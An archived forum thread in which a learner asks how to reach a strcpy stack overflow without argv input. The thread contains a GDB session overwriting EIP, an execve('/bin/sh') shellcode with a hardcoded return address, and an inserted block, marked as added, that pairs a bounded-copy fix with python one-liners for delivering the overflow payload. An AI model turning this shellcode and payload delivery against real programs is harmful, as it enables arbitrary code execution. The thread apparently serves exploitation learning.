Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 5 posts ] 
 Post subject: how to find a vulnerability in a program
PostPosted: 17 Aug 2008 07:55 

Joined: 17 Aug 2008 07:18
Posts: 3
Hello, and sorry for my bad English, I am French. I will explain my problem with an example:

I downloaded a program and found a vulnerability in the source code. I know the textbook cases: stack-based overflow, heap-based overflow, etc.

But I only know how to exploit them through argv. If the program takes no arguments, and there is no direct input to fill the buffer, what do I do? What if the strcpy is somewhere in the middle of the program and is not filled from argv[n]... How do I fill the buffer to see if the program crashes?
I'm on Debian etch, Ubuntu 8.04, and Windows XP SP3.


 Post subject:
PostPosted: 17 Aug 2008 10:53 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
If you have something like strcpy(buffer, argv[1]), it means that the command-line arguments of the program are read for sure.
In this case, if the strcpy is in main(), the buffer overflow shouldn't have a real effect since there is no return address to overwrite.


 Post subject:
PostPosted: 17 Aug 2008 11:38 

Joined: 17 Aug 2008 07:18
Posts: 3
OK, thank you, but consider this example:

Code:
#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy() does not check the 30-byte limit
   of the stack buffer, so a longer string overwrites the saved frame. */
void copier(char *chaine)
{
   char buffer[30];
   strcpy(buffer, chaine);
   printf("%s", buffer);
}

int main(void)
{
   char buf[512];     /* never filled by the program: uninitialized */
   copier(buf);
   return 0;
}

With GDB I do:
Code:
Breakpoint 1, main () at vuln.c:15
15      copier(buf);
(gdb) set buf="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX"
(gdb) n

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) p $eip
$1 = (void (*)()) 0x58585858
(gdb)


The overflow does overwrite the return address.
And now with a shellcode instead of a plain buffer:

Code:
#include <stdio.h>
#include <string.h>

/* Same vulnerable function as above: unbounded strcpy() into 30 bytes. */
void copier(char *chaine)
{
   char buffer[30];
   strcpy(buffer, chaine);
   printf("%s", buffer);
}

int main(void)
{
   /* 12 NOPs, a 22-byte execve("/bin/sh") shellcode (34 bytes in total:
      30 for buffer plus 4 for the saved EBP), then 0xbffff53f, the stack
      address that replaces the saved return address of copier(). */
   char buf[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\x3f\xf5\xff\xbf";
   copier(buf);
   return 0;
}


I run it with GDB:

Code:
(gdb) r
Starting program: /home/nels/prog_C/vuln
Executing new program: /bin/dash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
$


Without GDB, how can I write into the buffer?


 Post subject:
PostPosted: 17 Aug 2008 12:23 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Naturally you can't.
Without input from the attacker (file, network, command-line argument, environment variable and so on) there is no vulnerability.

In your case there is no bug at all because buf is not filled with data; it's just uninitialized.


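Luigi's point in the post above, as an added example that is not part of the thread and is neither his nor the poster's code: the overflow in copier() only matters once the data reaching strcpy() comes from outside the process. The block below feeds the same 30-byte buffer from the input paths he names (argv, an environment variable, a file or stdin), puts a bounded copy that rejects overlong input next to it, and records the 34-byte offset at which the poster's GDB session showed the saved return address being hit. The names copier_bounded, read_attacker_input and the VULN_INPUT variable are assumptions made for this example, and the offset assumes the same 32-bit x86 frame layout (30-byte buffer directly below a 4-byte saved EBP) that the session shows.

```c
/* Added example, not code from the thread. Names copier_bounded,
 * read_attacker_input and VULN_INPUT are assumptions for this example. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 30   /* same size as the thread's char buffer[30] */

/* Bounded replacement for the thread's copier(): refuses any string that
 * would not fit, terminator included, into the 30-byte stack buffer.
 * Returns 0 when copied, -1 when the input was rejected. The copied text
 * is optionally handed back through `out` so callers can check it. */
int copier_bounded(const char *chaine, char *out, size_t outsz)
{
    char buffer[BUFSZ];
    size_t len = strlen(chaine);

    if (len >= sizeof buffer)          /* would overflow: reject, don't copy */
        return -1;
    memcpy(buffer, chaine, len + 1);   /* fits, terminator included */
    if (out != NULL)
        snprintf(out, outsz, "%s", buffer);
    return 0;
}

/* 1 when an input of `len` bytes copied with strcpy() into the thread's
 * buffer reaches the saved return address of copier(): 30 bytes of buffer
 * plus 4 bytes of saved EBP, so the 35th byte onward lands on it. Assumes
 * the 32-bit x86 frame layout seen in the poster's GDB session (no padding). */
int reaches_return_address(size_t len)
{
    return len > BUFSZ + 4;
}

/* Attacker-controlled input, checked in the order a program might read it:
 * argv[1], then the environment variable VULN_INPUT (assumed name), then
 * up to 4095 bytes from the stream `in` (stdin in a real program, a file
 * in the test). Returns a malloc'd string the caller frees, or NULL. */
char *read_attacker_input(int argc, char **argv, FILE *in)
{
    const char *env;
    char *buf;
    size_t n;

    if (argc > 1)
        return strdup(argv[1]);
    if ((env = getenv("VULN_INPUT")) != NULL)
        return strdup(env);
    if (in == NULL)
        return NULL;
    buf = malloc(4096);
    if (buf == NULL)
        return NULL;
    n = fread(buf, 1, 4095, in);
    buf[n] = '\0';
    return buf;
}

int main(int argc, char **argv)
{
    char shown[BUFSZ];
    char *data = read_attacker_input(argc, argv, stdin);

    if (data == NULL)
        return 1;
    /* Without GDB the overflow is delivered through one of these paths,
     * e.g. ./vuln "$(python -c 'print "A"*34 + "XXXX"')",
     *      VULN_INPUT="$(python -c '...')" ./vuln,
     *      python -c '...' | ./vuln
     * With the bounded copy the oversized input is refused instead. */
    if (copier_bounded(data, shown, sizeof shown) < 0)
        printf("rejected %zu bytes: would overflow the %d-byte buffer\n",
               strlen(data), BUFSZ);
    else
        printf("%s\n", shown);
    free(data);
    return 0;
}
```

Against the first snippet in the thread the same three delivery paths crash the program exactly as the GDB session did, because strcpy() there has no check; the bounded version makes the rejection visible instead, which is also the simplest way to confirm, without a debugger, that attacker data really reaches the copy.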
 Post subject:
PostPosted: 17 Aug 2008 12:55 

Joined: 17 Aug 2008 07:18
Posts: 3
OK, I have been trying for 2 days to write into the buffer without GDB... Thank you very much for all these details.

PS: your small tool "morsegen" is great fun. Nice find.

